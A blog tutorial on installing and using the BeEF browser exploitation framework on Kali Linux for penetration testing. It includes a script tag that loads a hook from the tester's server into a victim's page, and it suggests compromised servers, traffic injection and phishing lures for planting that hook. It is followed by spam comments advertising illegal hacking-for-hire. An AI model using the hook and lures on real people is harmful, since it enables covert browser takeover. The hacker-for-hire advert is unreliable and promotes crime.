BeEF is short for The Browser Exploitation Framework. it’s a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.
Growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
In this post, I’ll show you the quickest way to get up and running with BeEF using Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.
Installation on Kali is very simple. Since they’ve created a nice package we can simply use apt-get to install it. Just to make sure we’ve got the most recent version, we’ll update our package list first.
#apt-get update
#apt-get install beef-xss
Once the install is finished, we can change to its directory and launch BeEF:
#cd /usr/share/beef-xss
#./beef
You should see the following:
Now that BeEF is up and running, let’s check out the control panel. Using a web browser we’ll browse to the link listed above. In my case it’s http://192.168.31.20:3000/ui/panel. You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The user name and password are beef:beef.
The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target. In this example, the location of my BeEF hook is at http://192.168.31.20:3000/hook.js.
In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.
<script src= “http://192.168.31.20:3000/hook.js” type= “text/javascript” ></script>
In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.
For demonstration, we going to use demo page IP:3000/demos/butcher/index.html in BeEF. The page shows some delicious looking beef, and nothing really seems awry. But what the user can’t tell, is that this particular webpage contained a hook. A malicious program that allows an attacker to hook the browser and, well, pretty much take over complete control of the browser.
As soon as the visitor simply visits the page, the hook is
set. Notice that the user does not have to run anything or mouse over anything
for the attack to work. Just visiting the page triggers the attack.
Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.
Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.
Now click on the Commands tab. You’ll find a wide range of
commands and exploits that can be launched against your target. Try them out,
but be patient; sometimes it takes awhile for commands to finish and report
their results. The more you experiment with each command, the more you’ll know
how reliable it is and how best to use it.
Now that you’re up and running there’s a lot more that you can do with BeEF. Experiment with the different options in your lab so that you’ll be ready to go when the opportunity presents itself during an engagement.
ReplyDeleteIf you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
Email: cybergoldenhacker at gmail dot com
The Browser Exploitation Framework (BeEF) is an open-source security tool designed for testing and exploiting web browsers. 12 Best Laptops Ethical hackers and security professionals use BeEF to assess the security of web applications and web browsers by identifying vulnerabilities.
ReplyDelete